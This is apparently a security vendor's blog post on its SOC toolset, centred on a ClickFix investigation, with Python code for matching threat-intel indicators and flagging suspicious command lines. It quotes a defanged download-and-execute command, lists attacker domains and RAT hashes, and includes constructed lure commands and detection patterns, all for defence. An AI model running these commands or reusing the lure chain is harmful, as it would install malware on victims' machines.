Friday, August 8, 2025

A SOC Toolbelt: Best Practices for Security

A SOC Toolbelt

To keep pace with rapidly evolving threats and the decreasing breakout times of attackers, the LevelBlue security operations team leverages multiple tools and key partnerships to shorten the time between detection and response. Below are some examples of the tools used by our SOC and some of the circumstances in which each tool would be used.

A Partnership with SentinelOne

Through LevelBlue’s Managed Endpoint Security with SentinelOne, our SOC has delivered greater protection and endpoint visibility to our customers. The SOC has greatly reduced the time between detection and response with STAR (Storyline Active Response) alarms within SentinelOne. These STAR alarms are custom built by our team and are informed by proactive detections from our threat hunters around recent threats and TTPs (Tactics, Techniques, and Procedures).

By utilizing threat intelligence reports and data at hand, our team was able to perform a deeper review into the TTPs of recent threats. This allowed for the creation of custom rules to more quickly detect IOCs (Indicators of Compromise) within our customers’ environments. Our LevelBlue Labs threat intelligence team also utilized this information to create new rules in USM Anywhere, our open XDR platform.

As a trusted security partner, LevelBlue is always striving to improve our detection and response times to increase value and provide more proactive support to our customers. These tools are vital for us to improve response times and prevent threats from affecting our customers.

Bundling Managed Endpoint Security and Managed Threat Detection and Response is a great option for customers who lack endpoint data ingestion in USM Anywhere (USMA) and want improved visibility. The bundle also benefits customers looking to balance the cost of third-party security partners against the cost of additional monitoring tools. Instead of buying multiple tools to bring potentially noisy data into USMA, bundling provides comprehensive visibility across your endpoints along with the 24/7 monitoring that is part of our Managed Threat Detection and Response offer.

Open Threat Exchange (OTX)

The LevelBlue Labs Open Threat Exchange (OTX) is another integral tool our analysts depend on during alarm triage and investigation. The platform is one of the largest threat intelligence communities, with over 330,000 members worldwide.

LevelBlue Labs continuously updates OTX, and threat intelligence from OTX integrates seamlessly into LevelBlue’s USMA platform. Our customers’ environments are scanned for OTX pulse matches and IOCs. If an indicator from a pulse the customer is subscribed to is discovered in their environment, an alarm is generated.

Upon examining an alarm in USMA, analysts are directed to the associated pulse. The analyst can use the additional IOCs associated with that pulse to further their investigation. 

Centralizing this information in USMA helps our analysts streamline incident triage and these pulses can be compared with other Open-Source Intelligence (OSINT) to give analysts more context in their investigation. Analysts can also use the OTX Pulse ID directly within USMA to query the customers’ environment for any additional IOCs associated with the threat being investigated.


Figure 1: Event search of customer instance using OTX ID
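As an added illustration of the pulse-to-alarm flow described above (example code written for this page, not LevelBlue's or USM Anywhere's own matching logic), the following Python matches constructed endpoint telemetry against a constructed pulse in the shape the OTX API returns (an id, a name, and indicators with a type and an indicator value). The pulse ID, domain, URL and hash values are placeholders; the SHA1 is that of the empty file. It refangs defanged indicators, normalises each indicator type, raises one alarm per matching event carrying the pulse ID, and then answers the follow-up question an analyst asks with that ID: which hosts hit it.

```python
import re
from urllib.parse import urlsplit

# Constructed pulse in the shape the OTX API returns (id, name, indicators).
# Every value here is a placeholder for this example, not a real IOC.
PULSE = {
    "id": "0123456789abcdef01234567",
    "name": "ClickFix lure infrastructure (constructed example)",
    "indicators": [
        {"type": "domain", "indicator": "lure-example[.]test"},
        {"type": "URL", "indicator": "hxxps://lure-example[.]test/lv/index.php"},
        # SHA1 of the empty file, used purely as a placeholder hash.
        {"type": "FileHash-SHA1",
         "indicator": "da39a3ee5e6b4b0d3255bfef95601890afd80709"},
        {"type": "CVE", "indicator": "CVE-0000-0000"},  # a type this matcher ignores
    ],
}

# Constructed endpoint telemetry: DNS, process and HTTP events from three hosts.
EVENTS = [
    {"type": "dns", "host": "ws-042", "query": "Lure-Example.test."},
    {"type": "process", "host": "ws-042",
     "sha1": "DA39A3EE5E6B4B0D3255BFEF95601890AFD80709", "cmdline": "x.bat"},
    {"type": "http", "host": "ws-017",
     "url": "https://lure-example.test/lv/index.php?id=12345678"},
    {"type": "dns", "host": "ws-099", "query": "updates.example.test"},
    {"type": "process", "host": "ws-099", "cmdline": "notepad.exe"},  # no hash
]


def refang(value: str) -> str:
    """Undo common defanging ([.] and hxxp) so indicators compare to live data."""
    value = value.strip().replace("[.]", ".").replace("[://]", "://")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


def norm_domain(value: str) -> str:
    return refang(value).lower().rstrip(".")


def norm_hash(value: str) -> str:
    return value.strip().lower()


def norm_url(value: str) -> tuple:
    """Compare URLs on scheme, host and path only; the query string is ignored
    because lures append per-victim identifiers to it."""
    u = urlsplit(refang(value))
    return (u.scheme.lower(), u.netloc.lower(), u.path or "/")


NORMALIZERS = {
    "domain": norm_domain, "hostname": norm_domain, "URL": norm_url,
    "FileHash-SHA1": norm_hash, "FileHash-SHA256": norm_hash,
    "FileHash-MD5": norm_hash,
}


def index_pulse(pulse: dict) -> dict:
    """Map indicator type -> {normalised value: original indicator string}."""
    index = {}
    for ind in pulse["indicators"]:
        fn = NORMALIZERS.get(ind["type"])
        if fn is None:
            continue  # CVE, YARA and similar types need other matching logic
        index.setdefault(ind["type"], {})[fn(ind["indicator"])] = ind["indicator"]
    return index


def event_observables(event: dict):
    """Yield (indicator type, normalised value) pairs an event can match on."""
    if event["type"] == "dns":
        yield "domain", norm_domain(event["query"])
    elif event["type"] == "process" and event.get("sha1"):
        yield "FileHash-SHA1", norm_hash(event["sha1"])
    elif event["type"] == "http":
        url = norm_url(event["url"])
        yield "URL", url
        yield "domain", url[1]  # the host part is also checked against domain IOCs


def match_events(pulse: dict, events: list) -> list:
    """One alarm per event that matches any indicator of the pulse."""
    index = index_pulse(pulse)
    alarms = []
    for ev in events:
        hits = [(t, index[t][v]) for t, v in event_observables(ev)
                if v in index.get(t, {})]
        if hits:
            alarms.append({"pulse_id": pulse["id"], "host": ev["host"],
                           "matched": hits, "event": ev})
    return alarms


def hosts_for_pulse(alarms: list, pulse_id: str) -> list:
    """The pivot an analyst runs with the pulse ID: which hosts matched it."""
    return sorted({a["host"] for a in alarms if a["pulse_id"] == pulse_id})


if __name__ == "__main__":
    found = match_events(PULSE, EVENTS)
    for a in found:
        print(a["host"], a["matched"])
    print("hosts:", hosts_for_pulse(found, PULSE["id"]))
```

Normalising before comparison is what makes the match reliable: the DNS event carries mixed case and a trailing dot, the process event an upper-case hash, and the HTTP request a per-victim query string, and all three still hit the pulse.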

STAR Rules

The LevelBlue SOC has also created a custom alerting system based on high-fidelity detection methods that has shortened response times by bringing these alerts to the forefront of our analysts’ attention. These high-fidelity methods, whether custom STAR rules or user compromise detections, are another example of the proactive work our SOC team does to improve value for our customers.

SentinelOne’s STAR rules have proven to be an invaluable addition to the detection toolset already utilized by the MDR SOC. When a threat is detected and an alarm has been raised, a SOC analyst will use different tools for analyzing the threat and its related artifacts. 

The LevelBlue SOC Investigates: ClickFix

ClickFix is a social engineering technique in which a fake error or verification prompt persuades the victim to paste and run a command themselves, lending the malicious script the appearance of legitimacy. In the following investigation, the SOC used several tools, including Joe Sandbox, SentinelOne Deep Visibility, and the SentinelOne Blocklist, to analyze a ClickFix attack. The investigation began when the SOC received an alarm for a command line indicative of ClickFix malware (see figure 2).


Figure 2: ClickFix alarm in USMA

The command line shown above allowed our team to retrieve the file it downloads and the information contained in that file. With this, our team could search across our customer base to determine whether the file existed in any other environment and add its hashes to our global SentinelOne blocklist.

To review this command line, the SOC typically uses an online sandbox service such as Joe Sandbox or ANY.RUN. Joe Sandbox is preferable when customer data may be present, because it runs in a private tenant. ANY.RUN is also a powerful tool, but its free service is public, so it is used only when it is confirmed that no customer data is involved.

After running the command line above in Joe Sandbox, we received an in-depth activity report (see figure 3 below).


Figure 3: Initial command line executed in ClickFix attack

When the command ran in Joe Sandbox, nothing visible appeared on the front end, but the generated report listed the suspicious files that were dropped (see figure 4 below).


Figure 4: List of suspicious files from Joe’s Sandbox report

From the report we retrieved the SHA1 hashes of the dropped files and searched for potential compromise across our bundled customers’ environments. Using SentinelOne Deep Visibility, our SOC team wrote a simple query against the file hash fields for any of the hashes obtained from the report:

#hash contains ( "A48C95DF3D802FFB6E5ECADA542CC5E028192F2B" , "7EC84BE84FE23F0B0093B647538737E1F19EBB03" , "C2E5EA8AFCD46694448D812D1FFCD02D1F594022" , "3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7" , "98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07" , "01873977C871D3346D795CF7E3888685DE9F0B16" , "C4E27A43075CE993FF6BB033360AF386B2FC58FF" , "906F7E94F841D464D4DA144F7C858FA2160E36DB" , "A556209655DCB5E939FD404F57D199F2BB6DA9B3" , "AD464EB7CF5C19C8A443AB5B590440B32DBC618F" )

Running this query showed us 5 detections from an incident that occurred a week prior in a different customer’s environment (see figure 5 below).


Figure 5: Detections from query searching for hashes obtained in report

Our team also used SentinelOne’s Blocklist feature to add these hashes at global scope, so the file is killed and quarantined if it is detected in any customer environment (see figure 6).


Figure 6: Adding SHA1 hash of NetSupport RAT to SentinelOne global blocklist

When conducting static analysis of a website or a potential phishing link, our analysts typically use a URL scanning service that visits the site and returns a screenshot of the page together with its source code, redirects, scripts, and images. In the following scenario, our team received an alarm for a DNS request to a suspicious domain included in one of our OTX pulses (see figure 7).


Figure 7: OTX alarm in USMA for compromised website responsible for ClickFix attack

Upon initial review, the domain appeared to belong to an ordinary travel website. Our team then inspected the network traffic captured by the scan in its HTTP tab and looked for any redirects that occurred during the scan in the Redirects tab (see figure 8).


Figure 8: URL Scan of the compromised site islonline[.]org

Under the HTTP tab, our team saw that a script named j.js hosted on the site redirected the browser to hxxps[://]lang3666[.]top/lv/xfa[.].


Figure 9: Redirect to suspicious js file and .top domain

By running a URL scan, our analysts were able to retrieve the source code of the js file:


Figure 10: Source code of js file hosted on .top domain

Further review of the file revealed an obfuscated script that checks the user agent to determine whether the visitor is on a mobile phone or a desktop. The script then generates an 8-digit identifier and appends it to the URL hxxps[://]lang3666[.]top/lv/index[.]php?, which returns another script that fetches the final payload. ClickFix attacks often follow this chain of events and end in a command similar to the one shown below:

Cmd.exe /c curl.exe -k -Ss -X POST hxxps[://]pravaix[.]top/lv/lll[.]php -o "C:\Users\Public\jkdfgf.bat" && start /min "" C:\Users\Public\jkdfgf.bat
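The command above is the end of the chain the SOC alarms on. As an added example written for this page (not LevelBlue's STAR rule or USMA correlation logic), the following Python scores a command line for the three ClickFix traits visible in it: a downloader (curl with an output file, certutil -urlcache, PowerShell web cmdlets, or mshta pointed at a remote URL), a drop into a directory any user can write to such as C:\Users\Public, and immediate chained execution (&& start, iex, a hidden or minimised window). It also extracts the URL and dropped-file path as IOCs for blocklisting and cross-tenant hunting. All command lines in it are constructed, with the placeholder domain lure-example.test standing in for attacker infrastructure; the first one mirrors the shape of the command above.

```python
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Directories any interactive user can write to without elevation; ClickFix
# lures drop their stage there so the pasted command never needs a UAC prompt.
DROP_PATH_RE = re.compile(
    r"(?:C:\\Users\\Public|C:\\ProgramData|%TEMP%|%APPDATA%|"
    r"\\AppData\\(?:Local|Roaming))\\[^\s\"']+",
    re.IGNORECASE,
)

# Stage 1: something that fetches the payload.
DOWNLOADERS = {
    "curl-output": re.compile(r"\bcurl(?:\.exe)?\b.*\s-o\s",
                              re.IGNORECASE | re.DOTALL),
    "certutil-fetch": re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.IGNORECASE),
    "powershell-web": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b",
        re.IGNORECASE),
    "mshta-remote": re.compile(
        r"\bmshta(?:\.exe)?\s+[\"']?(?:https?|javascript|vbscript):", re.IGNORECASE),
}

# Stage 2: the fetched content is run immediately, usually out of sight.
EXECUTORS = {
    "chained-start": re.compile(r"&&\s*start\b", re.IGNORECASE),
    "iex": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden\b|\s/min\b", re.IGNORECASE),
}

# Modifiers that prove nothing alone but raise confidence (the sample above uses -k).
MODIFIERS = {
    "curl-insecure-tls": re.compile(r"\bcurl(?:\.exe)?\b[^&|]*\s-k\b", re.IGNORECASE),
}


@dataclass
class Verdict:
    suspicious: bool
    reasons: list
    urls: list
    dropped_files: list


def _hits(patterns: dict, cmdline: str) -> list:
    return [name for name, rx in patterns.items() if rx.search(cmdline)]


def analyze(cmdline: str) -> Verdict:
    """Flag a command line when a downloader is paired with a drop into a
    user-writable path or with immediate execution; mshta with a remote
    target is flagged on its own. Also returns the IOCs worth pivoting on."""
    dl = _hits(DOWNLOADERS, cmdline)
    ex = _hits(EXECUTORS, cmdline)
    mods = _hits(MODIFIERS, cmdline)
    urls = list(dict.fromkeys(URL_RE.findall(cmdline)))        # dedupe, keep order
    dropped = list(dict.fromkeys(DROP_PATH_RE.findall(cmdline)))
    suspicious = ("mshta-remote" in dl) or (bool(dl) and (bool(ex) or bool(dropped)))
    return Verdict(suspicious, dl + ex + mods, urls, dropped)


# Constructed command lines: three lure shapes followed by two benign controls
# (a plain download to the user's own folder, and no download at all).
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c curl.exe -k -Ss -X POST https://lure-example.test/lv/lll.php '
    r'-o "C:\Users\Public\abc.bat" && start /min "" C:\Users\Public\abc.bat',
    r'powershell.exe -w hidden -c "irm https://lure-example.test/x | iex"',
    r'mshta.exe https://lure-example.test/p.hta',
    r'curl.exe -o C:\Users\alice\Downloads\report.pdf https://intranet.example.test/report.pdf',
    r'cmd.exe /c dir C:\Users\Public',
]


def triage(cmdlines: list) -> list:
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, v in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        print("SUSPICIOUS" if v.suspicious else "ok", v.reasons, v.urls, v.dropped_files)
```

Requiring two stages (fetch plus drop-or-execute) rather than a single keyword is what keeps the plain curl download in the fourth sample out of the alarm queue; the extracted URL and dropped path from a true positive are what feed the blocklist and the cross-tenant hash hunt described earlier.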

Conclusion

As seen in the ClickFix investigation above, USM Anywhere’s integrations enable the LevelBlue SOC to greatly reduce the time between detection and response.

You can read more about ClickFix and the LevelBlue SOC’s recommendations to protect your environments in the LevelBlue Threat Trends Report, Fool Me Once: How Cybercriminals Are Mastering the Art of Deception.

The content provided herein is for general informational purposes only and should not be construed as legal, regulatory, compliance, or cybersecurity advice. Organizations should consult their own legal, compliance, or cybersecurity professionals regarding specific obligations and risk management strategies. While LevelBlue’s Managed Threat Detection and Response solutions are designed to support threat detection and response at the endpoint level, they are not a substitute for comprehensive network monitoring, vulnerability management, or a full cybersecurity program.
